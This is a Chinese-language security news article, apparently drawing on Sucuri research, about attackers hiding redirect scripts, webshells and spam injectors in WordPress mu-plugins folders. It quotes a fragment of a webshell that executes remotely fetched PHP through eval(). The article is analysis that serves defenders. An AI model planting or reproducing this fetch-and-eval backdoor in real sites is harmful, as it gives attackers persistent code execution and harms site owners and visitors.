近期的一些发现揭示了一个令人担忧的趋势：威胁行为者正策略性地将恶意代码隐藏在 WordPress 网站的 mu-plugins目录中。

这个目录对攻击者来说特别有价值，因为它会随着 WordPress 自动加载，这使得恶意代码的检测和清除变得更加困难。

已发现的恶意软件变种采用了复杂的技术来保持其持续性，同时执行从用户重定向到完全接管网站等一系列有害功能。

这些攻击针对的是 mu-plugins文件夹，攻击者使用了多种看似合法但包含恶意代码的恶意软件类型。

其中包括将毫无防备的访客重定向到有害域名的重定向脚本、为攻击者提供远程代码执行能力的Webshell，以及操纵网站内容以分发不需要的材料的垃圾邮件注入器。

Sucuri 的研究人员检测到，这些恶意软件变种经过精心设计，通过让搜索引擎爬虫和特权用户无法看到其恶意行为来躲避检测。

他们的分析显示，攻击者正在使用越来越复杂的技术，以确保他们的恶意软件一直处于隐藏状态，同时最大限度地发挥其对目标网站的影响。

感染了这些恶意脚本的网站会面临多种后果，包括声誉受损、潜在的数据被盗、向访客传播恶意软件以及对网站进行未经授权的修改。

最具破坏性的变种使攻击者能够持续访问被攻陷的网站，为长期的恶意利用奠定了基础。

Webshell 分析：远程代码执行能力

已发现的最令人担忧的变种是一个伪装成合法 WordPress 插件文件的Webshell，它被放置在 “wp-content/mu-plugins/index.php” 位置。

这个Webshell包含旨在下载并执行远程 PHP 脚本的代码：

if (curl_errno($connectionHandle))

die(‘cURL error occurred: ‘. curl_error($connectionHandle));

}

curl_close($connectionHandle);

eval(“?>” . $retrievedCode);

这段代码片段展示了恶意软件如何使用 PHP 的 eval () 函数来执行从远程服务器获取的任意代码。

这种方法使攻击者能够以与 Web 服务器相同的权限运行命令，这有可能导致网站被完全攻陷。

一旦建立起这个后门，攻击者就能够上传文件、删除内容并访问敏感信息，将被攻陷的网站变成一个针对访客和连接系统发动进一步攻击的平台。